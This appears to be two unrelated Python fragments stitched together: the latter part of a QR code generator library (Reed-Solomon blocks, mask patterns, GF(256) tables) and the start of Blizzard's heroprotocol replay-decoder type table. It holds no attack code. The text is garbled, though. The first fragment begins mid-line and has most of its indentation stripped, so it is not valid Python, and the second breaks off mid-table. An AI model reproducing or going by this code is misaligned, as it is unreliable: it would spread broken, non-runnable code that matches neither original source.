not test and ( (bits >> i) & 1) == 1)
def _setupTypeInfo(self, test, maskPattern):
data = (self.errorCorrectLevel << 3) | maskPattern
bits = QRUtil.getBCHTypeInfo(data)
# vertical
for i in range(15):
mod = not test and ( (bits >> i) & 1) == 1
if i < 6:
self.modules[i][8] = mod
elif i < 8:
self.modules[i + 1][8] = mod
else:
self.modules[self.moduleCount - 15 + i][8] = mod
# horizontal
for i in range(15):
mod = not test and ( (bits >> i) & 1) == 1
if i < 8:
self.modules[8][self.moduleCount - i - 1] = mod
elif i < 9:
self.modules[8][15 - i - 1 + 1] = mod
else:
self.modules[8][15 - i - 1] = mod
# fixed
self.modules[self.moduleCount - 8][8] = not test
@staticmethod
def _createData(typeNumber, errorCorrectLevel, dataArray):
rsBlocks = RSBlock.getRSBlocks(typeNumber, errorCorrectLevel)
buffer = BitBuffer()
for data in dataArray:
buffer.put(data.getMode(), 4)
buffer.put(data.getLength(), data.getLengthInBits(typeNumber) )
data.write(buffer)
totalDataCount = sum(rsBlock.getDataCount()
for rsBlock in rsBlocks)
if buffer.getLengthInBits() > totalDataCount * 8:
raise Exception('code length overflow. (%s>%s)' %
(buffer.getLengthInBits(), totalDataCount * 8) )
# end code
if buffer.getLengthInBits() + 4 <= totalDataCount * 8:
buffer.put(0, 4)
# padding
while buffer.getLengthInBits() % 8 != 0:
buffer.put(False)
# padding
while True:
if buffer.getLengthInBits() >= totalDataCount * 8:
break
buffer.put(QRCode.PAD0, 8)
if buffer.getLengthInBits() >= totalDataCount * 8:
break
buffer.put(QRCode.PAD1, 8)
return QRCode._createBytes(buffer, rsBlocks)
@staticmethod
def _createBytes(buffer, rsBlocks):
offset = 0
maxDcCount = 0
maxEcCount = 0
dcdata = [None] * len(rsBlocks)
ecdata = [None] * len(rsBlocks)
for r in range(len(rsBlocks) ):
dcCount = rsBlocks[r].getDataCount()
ecCount = rsBlocks[r].getTotalCount() - dcCount
maxDcCount = max(maxDcCount, dcCount)
maxEcCount = max(maxEcCount, ecCount)
dcdata[r] = [0] * dcCount
for i in range(len(dcdata[r] ) ):
dcdata[r][i] = 0xff & buffer.getBuffer()[i + offset]
offset += dcCount
rsPoly = QRUtil.getErrorCorrectPolynomial(ecCount)
rawPoly = Polynomial(dcdata[r], rsPoly.getLength() - 1)
modPoly = rawPoly.mod(rsPoly)
ecdata[r] = [0] * (rsPoly.getLength() - 1)
for i in range(len(ecdata[r]) ):
modIndex = i + modPoly.getLength() - len(ecdata[r])
ecdata[r][i] = modPoly.get(modIndex) if modIndex >= 0 else 0
totalCodeCount = sum(rsBlock.getTotalCount()
for rsBlock in rsBlocks)
data = [0] * totalCodeCount
index = 0
for i in range(maxDcCount):
for r in range(len(rsBlocks) ):
if i < len(dcdata[r] ):
data[index] = dcdata[r][i]
index += 1
for i in range(maxEcCount):
for r in range(len(rsBlocks) ):
if i < len(ecdata[r] ):
data[index] = ecdata[r][i]
index += 1
return data
@staticmethod
def getMinimumQRCode(data, errorCorrectLevel):
mode = Mode.MODE_8BIT_BYTE # fixed to 8bit byte
qr = QRCode()
qr.setErrorCorrectLevel(errorCorrectLevel)
qr.addData(data)
length = qr.getData(0).getLength()
for typeNumber in range(1, 11):
if length <= QRUtil.getMaxLength(
typeNumber, mode, errorCorrectLevel):
qr.setTypeNumber(typeNumber)
break
qr.make()
return qr
class Mode:
MODE_NUMBER = 1 << 0
MODE_ALPHA_NUM = 1 << 1
MODE_8BIT_BYTE = 1 << 2
MODE_KANJI = 1 << 3
class ErrorCorrectLevel:
L = 1 # 7%
M = 0 # 15%
Q = 3 # 25%
H = 2 # 30%
class MaskPattern:
PATTERN000 = 0
PATTERN001 = 1
PATTERN010 = 2
PATTERN011 = 3
PATTERN100 = 4
PATTERN101 = 5
PATTERN110 = 6
PATTERN111 = 7
class QRUtil:
@staticmethod
def getPatternPosition(typeNumber):
return QRUtil.PATTERN_POSITION_TABLE[typeNumber - 1]
PATTERN_POSITION_TABLE = [
[],
[6, 18],
[6, 22],
[6, 26],
[6, 30],
[6, 34],
[6, 22, 38],
[6, 24, 42],
[6, 26, 46],
[6, 28, 50],
[6, 30, 54],
[6, 32, 58],
[6, 34, 62],
[6, 26, 46, 66],
[6, 26, 48, 70],
[6, 26, 50, 74],
[6, 30, 54, 78],
[6, 30, 56, 82],
[6, 30, 58, 86],
[6, 34, 62, 90],
[6, 28, 50, 72, 94],
[6, 26, 50, 74, 98],
[6, 30, 54, 78, 102],
[6, 28, 54, 80, 106],
[6, 32, 58, 84, 110],
[6, 30, 58, 86, 114],
[6, 34, 62, 90, 118],
[6, 26, 50, 74, 98, 122],
[6, 30, 54, 78, 102, 126],
[6, 26, 52, 78, 104, 130],
[6, 30, 56, 82, 108, 134],
[6, 34, 60, 86, 112, 138],
[6, 30, 58, 86, 114, 142],
[6, 34, 62, 90, 118, 146],
[6, 30, 54, 78, 102, 126, 150],
[6, 24, 50, 76, 102, 128, 154],
[6, 28, 54, 80, 106, 132, 158],
[6, 32, 58, 84, 110, 136, 162],
[6, 26, 54, 82, 110, 138, 166],
[6, 30, 58, 86, 114, 142, 170]
]
MAX_LENGTH = [
[ [41, 25, 17, 10], [34, 20, 14, 8], [27, 16, 11, 7], [17, 10, 7, 4] ],
[ [77, 47, 32, 20], [63, 38, 26, 16], [48, 29, 20, 12], [34, 20, 14, 8] ],
[ [127, 77, 53, 32], [101, 61, 42, 26], [77, 47, 32, 20], [58, 35, 24, 15] ],
[ [187, 114, 78, 48], [149, 90, 62, 38], [111, 67, 46, 28], [82, 50, 34, 21] ],
[ [255, 154, 106, 65], [202, 122, 84, 52], [144, 87, 60, 37], [106, 64, 44, 27] ],
[ [322, 195, 134, 82], [255, 154, 106, 65], [178, 108, 74, 45], [139, 84, 58, 36] ],
[ [370, 224, 154, 95], [293, 178, 122, 75], [207, 125, 86, 53], [154, 93, 64, 39] ],
[ [461, 279, 192, 118], [365, 221, 152, 93], [259, 157, 108, 66], [202, 122, 84, 52] ],
[ [552, 335, 230, 141], [432, 262, 180, 111], [312, 189, 130, 80], [235, 143, 98, 60] ],
[ [652, 395, 271, 167], [513, 311, 213, 131], [364, 221, 151, 93], [288, 174, 119, 74] ]
]
@staticmethod
def getMaxLength(typeNumber, mode, errorCorrectLevel):
t = typeNumber - 1
e = {
ErrorCorrectLevel.L: 0,
ErrorCorrectLevel.M: 1,
ErrorCorrectLevel.Q: 2,
ErrorCorrectLevel.H: 3
}[errorCorrectLevel]
m = {
Mode.MODE_NUMBER: 0,
Mode.MODE_ALPHA_NUM: 1,
Mode.MODE_8BIT_BYTE: 2,
Mode.MODE_KANJI: 3
}[mode]
return QRUtil.MAX_LENGTH[t][e][m]
@staticmethod
def getErrorCorrectPolynomial(errorCorrectLength):
a = Polynomial([1])
for i in range(errorCorrectLength):
a = a.multiply(Polynomial([1, QRMath.gexp(i)]) )
return a
@staticmethod
def getMaskFunction(maskPattern):
return {
MaskPattern.PATTERN000:
lambda i, j: (i + j) % 2 == 0,
MaskPattern.PATTERN001:
lambda i, j: i % 2 == 0,
MaskPattern.PATTERN010:
lambda i, j: j % 3 == 0,
MaskPattern.PATTERN011:
lambda i, j: (i + j) % 3 == 0,
MaskPattern.PATTERN100:
lambda i, j: (i // 2 + j // 3) % 2 == 0,
MaskPattern.PATTERN101:
lambda i, j: (i * j) % 2 + (i * j) % 3 == 0,
MaskPattern.PATTERN110:
lambda i, j: ( (i * j) % 2 + (i * j) % 3) % 2 == 0,
MaskPattern.PATTERN111:
lambda i, j: ( (i * j) % 3 + (i + j) % 2) % 2 == 0
}[maskPattern]
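    # e.g. getMaskFunction(MaskPattern.PATTERN000)(2, 3) is False since
    # (2 + 3) % 2 != 0; a True mask value flips the data module at (i, j).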
@staticmethod
def getLostPoint(qrcode):
moduleCount = qrcode.getModuleCount()
lostPoint = 0
# LEVEL1
for row in range(moduleCount):
for col in range(moduleCount):
sameCount = 0
dark = qrcode.isDark(row, col)
for r in range(-1, 2):
if row + r < 0 or moduleCount <= row + r:
continue
for c in range(-1, 2):
if col + c < 0 or moduleCount <= col + c:
continue
if r == 0 and c == 0:
continue
if dark == qrcode.isDark(row + r, col + c):
sameCount += 1
if sameCount > 5:
lostPoint += (3 + sameCount - 5)
# LEVEL2
for row in range(moduleCount - 1):
for col in range(moduleCount - 1):
count = 0
if qrcode.isDark(row, col):
count += 1
if qrcode.isDark(row + 1, col):
count += 1
if qrcode.isDark(row, col + 1):
count += 1
if qrcode.isDark(row + 1, col + 1):
count += 1
if count == 0 or count == 4:
lostPoint += 3
# LEVEL3
for row in range(moduleCount):
for col in range(moduleCount - 6):
if (qrcode.isDark(row, col)
and not qrcode.isDark(row, col + 1)
and qrcode.isDark(row, col + 2)
and qrcode.isDark(row, col + 3)
and qrcode.isDark(row, col + 4)
and not qrcode.isDark(row, col + 5)
and qrcode.isDark(row, col + 6) ):
lostPoint += 40
for col in range(moduleCount):
for row in range(moduleCount - 6):
if (qrcode.isDark(row, col)
and not qrcode.isDark(row + 1, col)
and qrcode.isDark(row + 2, col)
and qrcode.isDark(row + 3, col)
and qrcode.isDark(row + 4, col)
and not qrcode.isDark(row + 5, col)
and qrcode.isDark(row + 6, col) ):
lostPoint += 40
# LEVEL4
darkCount = 0
for col in range(moduleCount):
for row in range(moduleCount):
if qrcode.isDark(row, col):
darkCount += 1
ratio = abs(100 * darkCount // moduleCount // moduleCount - 50) // 5
lostPoint += ratio * 10
return lostPoint
G15 = ( (1 << 10) | (1 << 8) | (1 << 5) | (1 << 4) |
(1 << 2) | (1 << 1) | (1 << 0) )
G18 = ( (1 << 12) | (1 << 11) | (1 << 10) | (1 << 9) |
(1 << 8) | (1 << 5) | (1 << 2) | (1 << 0) )
G15_MASK = (1 << 14) | (1 << 12) | (1 << 10) | (1 << 4) | (1 << 1)
@staticmethod
def getBCHTypeInfo(data):
d = data << 10
while QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G15) >= 0:
d ^= (QRUtil.G15 << (QRUtil.getBCHDigit(d) -
QRUtil.getBCHDigit(QRUtil.G15) ) )
return ( (data << 10) | d) ^ QRUtil.G15_MASK
@staticmethod
def getBCHTypeNumber(data):
d = data << 12
while QRUtil.getBCHDigit(d) - QRUtil.getBCHDigit(QRUtil.G18) >= 0:
d ^= (QRUtil.G18 << (QRUtil.getBCHDigit(d) -
QRUtil.getBCHDigit(QRUtil.G18) ) )
return (data << 12) | d
@staticmethod
def getBCHDigit(data):
digit = 0
while data != 0:
digit += 1
data >>= 1
return digit
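    # getBCHDigit is effectively the bit length of its argument:
    # e.g. getBCHDigit(0b1011) == 4.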
@staticmethod
def stringToBytes(s):
return [ord(c) & 0xff for c in s]
class QR8BitByte:
def __init__(self, data):
self.mode = Mode.MODE_8BIT_BYTE
self.data = data
def getMode(self):
return self.mode
def getData(self):
return self.data
'''
def write(self, buffer): raise Exception('not implemented.')
def getLength(self): raise Exception('not implemented.')
'''
def write(self, buffer):
data = QRUtil.stringToBytes(self.getData() )
for d in data:
buffer.put(d, 8)
def getLength(self):
return len(QRUtil.stringToBytes(self.getData() ) )
def getLengthInBits(self, type):
if 1 <= type and type < 10: # 1 - 9
return {
Mode.MODE_NUMBER: 10,
Mode.MODE_ALPHA_NUM: 9,
Mode.MODE_8BIT_BYTE: 8,
Mode.MODE_KANJI: 8
}[self.mode]
elif type < 27: # 10 - 26
return {
Mode.MODE_NUMBER: 12,
Mode.MODE_ALPHA_NUM: 11,
Mode.MODE_8BIT_BYTE: 16,
Mode.MODE_KANJI: 10
}[self.mode]
elif type < 41: # 27 - 40
return {
Mode.MODE_NUMBER: 14,
Mode.MODE_ALPHA_NUM: 13,
Mode.MODE_8BIT_BYTE: 16,
Mode.MODE_KANJI: 12
}[self.mode]
else:
raise Exception('type:%s' % type)
class QRMath:
EXP_TABLE = None
LOG_TABLE = None
@staticmethod
def _init():
QRMath.EXP_TABLE = [0] * 256
for i in range(256):
QRMath.EXP_TABLE[i] = (1 << i if i < 8 else
QRMath.EXP_TABLE[i - 4] ^ QRMath.EXP_TABLE[i - 5] ^
QRMath.EXP_TABLE[i - 6] ^ QRMath.EXP_TABLE[i - 8])
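        # EXP_TABLE is built over GF(2^8) with the QR generator polynomial
        # x^8 + x^4 + x^3 + x^2 + 1, hence the feedback taps at
        # i - 4, i - 5, i - 6 and i - 8.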
QRMath.LOG_TABLE = [0] * 256
for i in range(255):
QRMath.LOG_TABLE[QRMath.EXP_TABLE[i] ] = i
@staticmethod
def glog(n):
if n < 1:
raise Exception('log(%s)' % n)
return QRMath.LOG_TABLE[n]
@staticmethod
def gexp(n):
while n < 0:
n += 255
while n >= 256:
n -= 255
return QRMath.EXP_TABLE[n]
# initialize statics
QRMath._init()
class Polynomial:
def __init__(self, num, shift=0):
offset = 0
length = len(num)
while offset < length and num[offset] == 0:
offset += 1
self.num = num[offset:] + [0] * shift
def get(self, index):
return self.num[index]
def getLength(self):
return len(self.num)
def __repr__(self):
return ','.join( [str(self.get(i) )
for i in range(self.getLength() ) ] )
def toLogString(self):
return ','.join( [str(QRMath.glog(self.get(i) ) )
for i in range(self.getLength() ) ] )
def multiply(self, e):
num = [0] * (self.getLength() + e.getLength() - 1)
for i in range(self.getLength() ):
for j in range(e.getLength() ):
num[i + j] ^= QRMath.gexp(QRMath.glog(self.get(i) ) +
QRMath.glog(e.get(j) ) )
return Polynomial(num)
def mod(self, e):
if self.getLength() - e.getLength() < 0:
return self
ratio = QRMath.glog(self.get(0) ) - QRMath.glog(e.get(0) )
num = self.num[:]
for i in range(e.getLength() ):
num[i] ^= QRMath.gexp(QRMath.glog(e.get(i) ) + ratio)
return Polynomial(num).mod(e)
class RSBlock:
RS_BLOCK_TABLE = [
# L
# M
# Q
# H
# 1
[1, 26, 19],
[1, 26, 16],
[1, 26, 13],
[1, 26, 9],
# 2
[1, 44, 34],
[1, 44, 28],
[1, 44, 22],
[1, 44, 16],
# 3
[1, 70, 55],
[1, 70, 44],
[2, 35, 17],
[2, 35, 13],
# 4
[1, 100, 80],
[2, 50, 32],
[2, 50, 24],
[4, 25, 9],
# 5
[1, 134, 108],
[2, 67, 43],
[2, 33, 15, 2, 34, 16],
[2, 33, 11, 2, 34, 12],
# 6
[2, 86, 68],
[4, 43, 27],
[4, 43, 19],
[4, 43, 15],
# 7
[2, 98, 78],
[4, 49, 31],
[2, 32, 14, 4, 33, 15],
[4, 39, 13, 1, 40, 14],
# 8
[2, 121, 97],
[2, 60, 38, 2, 61, 39],
[4, 40, 18, 2, 41, 19],
[4, 40, 14, 2, 41, 15],
# 9
[2, 146, 116],
[3, 58, 36, 2, 59, 37],
[4, 36, 16, 4, 37, 17],
[4, 36, 12, 4, 37, 13],
# 10
[2, 86, 68, 2, 87, 69],
[4, 69, 43, 1, 70, 44],
[6, 43, 19, 2, 44, 20],
[6, 43, 15, 2, 44, 16]
]
def __init__(self, totalCount, dataCount):
self.totalCount = totalCount
self.dataCount = dataCount
def getDataCount(self):
return self.dataCount
def getTotalCount(self):
return self.totalCount
def __repr__(self):
return ('(total=%s,data=%s)' % (self.totalCount, self.dataCount) )
@staticmethod
def getRSBlocks(typeNumber, errorCorrectLevel):
rsBlock = RSBlock.getRsBlockTable(typeNumber, errorCorrectLevel)
length = len(rsBlock) // 3
list = []
for i in range(length):
count = rsBlock[i * 3 + 0]
totalCount = rsBlock[i * 3 + 1]
dataCount = rsBlock[i * 3 + 2]
list += [RSBlock(totalCount, dataCount)] * count
return list
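    # e.g. getRSBlocks(3, ErrorCorrectLevel.Q) reads [2, 35, 17] from the
    # table and expands it to two RSBlock(total=35, data=17) blocks.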
@staticmethod
def getRsBlockTable(typeNumber, errorCorrectLevel):
return {
ErrorCorrectLevel.L:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 0],
ErrorCorrectLevel.M:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 1],
ErrorCorrectLevel.Q:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 2],
ErrorCorrectLevel.H:
RSBlock.RS_BLOCK_TABLE[ (typeNumber - 1) * 4 + 3]
}[errorCorrectLevel]
class BitBuffer:
    def __init__(self, increments=32):
        self.increments = increments
        self.buffer = [0] * self.increments
self.length = 0
def getBuffer(self):
return self.buffer
def getLengthInBits(self):
return self.length
def get(self, index):
return ( (self.buffer[index // 8] >> (7 - index % 8) ) & 1) == 1
def putBit(self, bit):
        if self.length == len(self.buffer) * 8:
            self.buffer += [0] * self.increments
if bit:
self.buffer[self.length // 8] |= (0x80 >> (self.length % 8) )
self.length += 1
def put(self, num, length):
for i in range(length):
self.putBit( ( (num >> (length - i - 1) ) & 1) == 1)
def __repr__(self):
return ''.join('1' if self.get(i) else '0'
for i in range(self.getLengthInBits() ) )
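# Quick illustrative check of BitBuffer semantics (not part of the library):
# put() appends bits most-significant first, and repr() renders them as text.
if __name__ == '__main__':
    _b = BitBuffer()
    _b.put(0b101, 3)
    assert repr(_b) == '101'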
|
|
# Copyright (c) 2015 Blizzard Entertainment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from heroprotocol.decoders import *
# Decoding instructions for each protocol type.
typeinfos = [
('_int',[(0,7)]), #0
('_int',[(0,4)]), #1
('_int',[(0,5)]), #2
('_int',[(0,6)]), #3
('_int',[(0,14)]), #4
('_int',[(0,22)]), #5
('_int',[(0,32)]), #6
('_choice',[(0,2),{0:('m_uint6',3),1:('m_uint14',4),2:('m_uint22',5),3:('m_uint32',6)}]), #7
('_struct',[[('m_userId',2,-1)]]), #8
('_blob',[(0,8)]), #9
('_int',[(0,8)]), #10
('_struct',[[('m_flags',10,0),('m_major',10,1),('m_minor',10,2),('m_revision',10,3),('m_build',6,4),('m_baseBuild',6,5)]]), #11
('_int',[(0,3)]), #12
('_bool',[]), #13
('_array',[(16,0),10]), #14
('_optional',[14]), #15
('_blob',[(16,0)]), #16
('_struct',[[('m_dataDeprecated',15,0),('m_data',16,1)]]), #17
('_struct',[[('m_signature',9,0),('m_version',11,1),('m_type',12,2),('m_elapsedGameLoops',6,3),('m_useScaledTime',13,4),('m_ngdpRootKey',17,5),('m_dataBuildNum',6,6),('m_fixedFileHash',17,7)]]), #18
('_fourcc',[]), #19
('_blob',[(0,7)]), #20
('_int',[(0,64)]), #21
('_struct',[[('m_region',10,0),('m_programId',19,1),('m_realm',6,2),('m_name',20,3),('m_id',21,4)]]), #22
('_struct',[[('m_a',10,0),('m_r',10,1),('m_g',10,2),('m_b',10,3)]]), #23
('_int',[(0,2)]), #24
('_optional',[10]), #25
('_struct',[[('m_name',9,0),('m_toon',22,1),('m_race',9,2),('m_color',23,3),('m_control',10,4),('m_teamId',1,5),('m_handicap',0,6),('m_observe',24,7),('m_result',24,8),('m_workingSetSlotId',25,9),('m_hero',9,10)]]), #26
('_array',[(0,5),26]), #27
('_optional',[27]), #28
('_blob',[(0,10)]), #29
('_blob',[(0,11)]), #30
('_struct',[[('m_file',30,0)]]), #31
('_optional',[13]), #32
('_int',[(-9223372036854775808,64)]), #33
('_blob',[(0,12)]), #34
('_blob',[(40,0)]), #35
('_array',[(0,6),35]), #36
('_optional',[36]), #37
('_array',[(0,6),30]), #38
('_optional',[38]), #39
('_struct',[[('m_playerList',28,0),('m_title',29,1),('m_difficulty',9,2),('m_thumbnail',31,3),('m_isBlizzardMap',13,4),('m_restartAsTransitionMap',32,16),('m_timeUTC',33,5),('m_timeLocalOffset',33,6),('m_description',34,7),('m_imageFilePath',30,8),('m_campaignIndex',10,15),('m_mapFileName',30,9),('m_cacheHandles',37,10),('m_miniSave',13,11),('m_gameSpeed',12,12),('m_defaultDifficulty',3,13),('m_modPaths',39,14)]]), #40
('_optional',[9]), #41
('_optional',[35]), #42
('_optional',[6]), #43
('_struct',[[('m_race',25,-1)]]), #44
('_struct',[[('m_team',25,-1)]]), #45
('_blob',[(0,9)]), #46
('_struct',[[('m_name',9,-18),('m_clanTag',41,-17),('m_clanLogo',42,-16),('m_highestLeague',25,-15),('m_combinedRaceLevels',43,-14),('m_randomSeed',6,-13),('m_racePreference',44,-12),('m_teamPreference',45,-11),('m_testMap',13,-10),('m_testAuto',13,-9),('m_examine',13,-8),('m_customInterface',13,-7),('m_testType',6,-6),('m_observe',24,-5),('m_hero',46,-4),('m_skin',46,-3),('m_mount',46,-2),('m_toonHandle',20,-1)]]), #47
('_array',[(0,5),47]), #48
('_struct',[[('m_lockTeams',13,-16),('m_teamsTogether',13,-15),('m_advancedSharedControl',13,-14),('m_randomRaces',13,-13),('m_battleNet',13,-12),('m_amm',13,-11),('m_competitive',13,-10),('m_practice',13,-9),('m_cooperative',13,-8),('m_noVictoryOrDefeat',13,-7),('m_heroDuplicatesAllowed',13,-6),('m_fog',24,-5),('m_observers',24,-4),('m_userDifficulty',24,-3),('m_clientDebugFlags',21,-2),('m_ammId',43,-1)]]), #49
('_int',[(1,4)]), #50
('_int',[(1,8)]), #51
('_bitarray',[(0,6)]), #52
('_bitarray',[(0,8)]), #53
('_bitarray',[(0,2)]), #54
('_bitarray',[(0,7)]), #55
('_struct',[[('m_allowedColors',52,-6),('m_allowedRaces',53,-5),('m_allowedDifficulty',52,-4),('m_allowedControls',53,-3),('m_allowedObserveTypes',54,-2),('m_allowedAIBuilds',55,-1)]]), #56
('_array',[(0,5),56]), #57
('_struct',[[('m_randomValue',6,-26),('m_gameCacheName',29,-25),('m_gameOptions',49,-24),('m_gameSpeed',12,-23),('m_gameType',12,-22),('m_maxUsers',2,-21),('m_maxObservers',2,-20),('m_maxPlayers',2,-19),('m_maxTeams',50,-18),('m_maxColors',3,-17),('m_maxRaces',51,-16),('m_maxControls',10,-15),('m_mapSizeX',10,-14),('m_mapSizeY',10,-13),('m_mapFileSyncChecksum',6,-12),('m_mapFileName',30,-11),('m_mapAuthorName',9,-10),('m_modFileSyncChecksum',6,-9),('m_slotDescriptions',57,-8),('m_defaultDifficulty',3,-7),('m_defaultAIBuild',0,-6),('m_cacheHandles',36,-5),('m_hasExtensionMod',13,-4),('m_isBlizzardMap',13,-3),('m_isPremadeFFA',13,-2),('m_isCoopMode',13,-1)]]), #58
('_optional',[1]), #59
('_optional',[2]), #60
('_struct',[[('m_color',60,-1)]]), #61
('_array',[(0,4),46]), #62
('_array',[(0,17),6]), #63
('_array',[(0,9),6]), #64
('_struct',[[('m_control',10,-20),('m_userId',59,-19),('m_teamId',1,-18),('m_colorPref',61,-17),('m_racePref',44,-16),('m_difficulty',3,-15),('m_aiBuild',0,-14),('m_handicap',0,-13),('m_observe',24,-12),('m_logoIndex',6,-11),('m_hero',46,-10),('m_skin',46,-9),('m_mount',46,-8),('m_artifacts',62,-7),('m_workingSetSlotId',25,-6),('m_rewards',63,-5),('m_toonHandle',20,-4),('m_licenses',64,-3),('m_tandemLeaderUserId',59,-2),('m_hasSilencePenalty',13,-1)]]), #65
('_array',[(0,5),65]), #66
('_struct',[[('m_phase',12,-11),('m_maxUsers',2,-10),('m_maxObservers',2,-9),('m_slots',66,-8),('m_randomSeed',6,-7),('m_hostUserId',59,-6),('m_isSinglePlayer',13,-5),('m_pickedMapTag',10,-4),('m_gameDuration',6,-3),('m_defaultDifficulty',3,-2),('m_defaultAIBuild',0,-1)]]), #67
('_struct',[[('m_userInitialData',48,-3),('m_gameDescription',58,-2),('m_lobbyState',67,-1)]]), #68
('_struct',[[('m_syncLobbyState',68,-1)]]), #69
('_struct',[[('m_name',20,-1)]]), #70
('_blob',[(0,6)]), #71
('_struct',[[('m_name',71,-1)]]), #72
('_struct',[[('m_name',71,-3),('m_type',6,-2),('m_data',20,-1)]]), #73
('_struct',[[('m_type',6,-3),('m_name',71,-2),('m_data',34,-1)]]), #74
('_array',[(0,5),10]), #75
('_struct',[[('m_signature',75,-2),('m_toonHandle',20,-1)]]), #76
('_struct',[[('m_gameFullyDownloaded',13,-14),('m_developmentCheatsEnabled',13,-13),('m_testCheatsEnabled',13,-12),('m_multiplayerCheatsEnabled',13,-11),('m_syncChecksummingEnabled',13,-10),('m_isMapToMapTransition',13,-9),('m_debugPauseEnabled',13,-8),('m_useGalaxyAsserts',13,-7),('m_platformMac',13,-6),('m_cameraFollow',13,-5),('m_baseBuildNum',6,-4),('m_buildNum',6,-3),('m_versionFlags',6,-2),('m_hotkeyProfile',46,-1)]]), #77
('_struct',[[]]), #78
('_int',[(0,16)]), #79
('_struct',[[('x',79,-2),('y',79,-1)]]), #80
('_struct',[[('m_which',12,-2),('m_target',80,-1)]]), #81
('_struct',[[('m_fileName',30,-5),('m_automatic',13,-4),('m_overwrite',13,-3),('m_name',9,-2),('m_description',29,-1)]]), #82
('_int',[(1,32)]), #83
('_struct',[[('m_sequence',83,-1)]]), #84
('_null',[]), #85
('_int',[(0,20)]), #86
('_int',[(-2147483648,32)]), #87
('_struct',[[('x',86,-3),('y',86,-2),('z',87,-1)]]), #88
('_struct',[[('m_targetUnitFlags',79,-7),('m_timer',10,-6),('m_tag',6,-5),('m_snapshotUnitLink',79,-4),('m_snapshotControlPlayerId',59,-3),('m_snapshotUpkeepPlayerId',59,-2),('m_snapshotPoint',88,-1)]]), #89
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89)}]), #90
('_struct',[[('m_target',90,-4),('m_time',87,-3),('m_verb',29,-2),('m_arguments',29,-1)]]), #91
('_struct',[[('m_data',91,-1)]]), #92
('_int',[(0,25)]), #93
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_abilCmdData',25,-1)]]), #94
('_optional',[94]), #95
('_choice',[(0,2),{0:('None',85),1:('TargetPoint',88),2:('TargetUnit',89),3:('Data',6)}]), #96
('_optional',[88]), #97
('_struct',[[('m_cmdFlags',93,-7),('m_abil',95,-6),('m_data',96,-5),('m_vector',97,-4),('m_sequence',83,-3),('m_otherUnit',43,-2),('m_unitGroup',43,-1)]]), #98
('_int',[(0,9)]), #99
('_bitarray',[(0,9)]), #100
('_array',[(0,9),99]), #101
('_choice',[(0,2),{0:('None',85),1:('Mask',100),2:('OneIndices',101),3:('ZeroIndices',101)}]), #102
('_struct',[[('m_unitLink',79,-4),('m_subgroupPriority',10,-3),('m_intraSubgroupPriority',10,-2),('m_count',99,-1)]]), #103
('_array',[(0,9),103]), #104
('_struct',[[('m_subgroupIndex',99,-4),('m_removeMask',102,-3),('m_addSubgroups',104,-2),('m_addUnitTags',64,-1)]]), #105
('_struct',[[('m_controlGroupId',1,-2),('m_delta',105,-1)]]), #106
('_struct',[[('m_controlGroupIndex',1,-3),('m_controlGroupUpdate',12,-2),('m_mask',102,-1)]]), #107
('_struct',[[('m_count',99,-6),('m_subgroupCount',99,-5),('m_activeSubgroupIndex',99,-4),('m_unitTagsChecksum',6,-3),('m_subgroupIndicesChecksum',6,-2),('m_subgroupsChecksum',6,-1)]]), #108
('_struct',[[('m_controlGroupId',1,-2),('m_selectionSyncData',108,-1)]]), #109
('_struct',[[('m_chatMessage',29,-1)]]), #110
('_struct',[[('m_speed',12,-1)]]), #111
('_int',[(-128,8)]), #112
('_struct',[[('m_delta',112,-1)]]), #113
('_struct',[[('x',87,-2),('y',87,-1)]]), #114
('_struct',[[('m_point',114,-4),('m_unit',6,-3),('m_pingedMinimap',13,-2),('m_option',87,-1)]]), #115
('_struct',[[('m_verb',29,-2),('m_arguments',29,-1)]]), #116
('_struct',[[('m_alliance',6,-2),('m_control',6,-1)]]), #117
('_struct',[[('m_unitTag',6,-1)]]), #118
('_struct',[[('m_unitTag',6,-2),('m_flags',10,-1)]]), #119
('_struct',[[('m_conversationId',87,-2),('m_replyId',87,-1)]]), #120
('_optional',[20]), #121
('_struct',[[('m_gameUserId',1,-6),('m_observe',24,-5),('m_name',9,-4),('m_toonHandle',121,-3),('m_clanTag',41,-2),('m_clanLogo',42,-1)]]), #122
('_array',[(0,5),122]), #123
('_int',[(0,1)]), #124
('_struct',[[('m_userInfos',123,-2),('m_method',124,-1)]]), #125
('_choice',[(0,3),{0:('None',85),1:('Checked',13),2:('ValueChanged',6),3:('SelectionChanged',87),4:('TextChanged',30),5:('MouseButton',6)}]), #126
('_struct',[[('m_controlId',87,-3),('m_eventType',87,-2),('m_eventData',126,-1)]]), #127
('_struct',[[('m_soundHash',6,-2),('m_length',6,-1)]]), #128
('_array',[(0,7),6]), #129
('_struct',[[('m_soundHash',129,-2),('m_length',129,-1)]]), #130
('_struct',[[('m_syncInfo',130,-1)]]), #131
('_struct',[[('m_queryId',79,-3),('m_lengthMs',6,-2),('m_finishGameLoop',6,-1)]]), #132
('_struct',[[('m_queryId',79,-2),('m_lengthMs',6,-1)]]), #133
('_struct',[[('m_animWaitQueryId',79,-1)]]), #134
('_struct',[[('m_sound',6,-1)]]), #135
('_struct',[[('m_transmissionId',87,-2),('m_thread',6,-1)]]), #136
